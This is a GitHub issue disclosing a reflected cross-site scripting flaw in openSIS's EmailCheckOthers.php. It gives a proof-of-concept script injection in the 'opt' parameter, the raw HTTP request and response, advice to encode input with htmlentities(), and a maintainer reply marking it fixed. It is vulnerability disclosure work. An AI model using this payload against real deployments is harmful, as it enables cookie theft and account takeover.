Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected XSS in EmailCheckOthers.php #199

Closed
CP04042K opened this issue Sep 5, 2021 · 1 comment
Closed

Reflected XSS in EmailCheckOthers.php #199

CP04042K opened this issue Sep 5, 2021 · 1 comment

Comments

@CP04042K
Copy link

CP04042K commented Sep 5, 2021

Description

By injecting Javascript code, an attacker can steal the user's cookie and take over the user's account. This happened because of the lack of security implementation fortype parameter. This was tested on demo website

Exploitation

Screenshot from 2021-09-05 14-06-22

Injection point:
HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf
Request:

GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 09:57:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Solution:

Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using htmlentities() function to encode the user's input before printing it out to the user's screen

@openSISAdmin
Copy link
Member

Fixed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants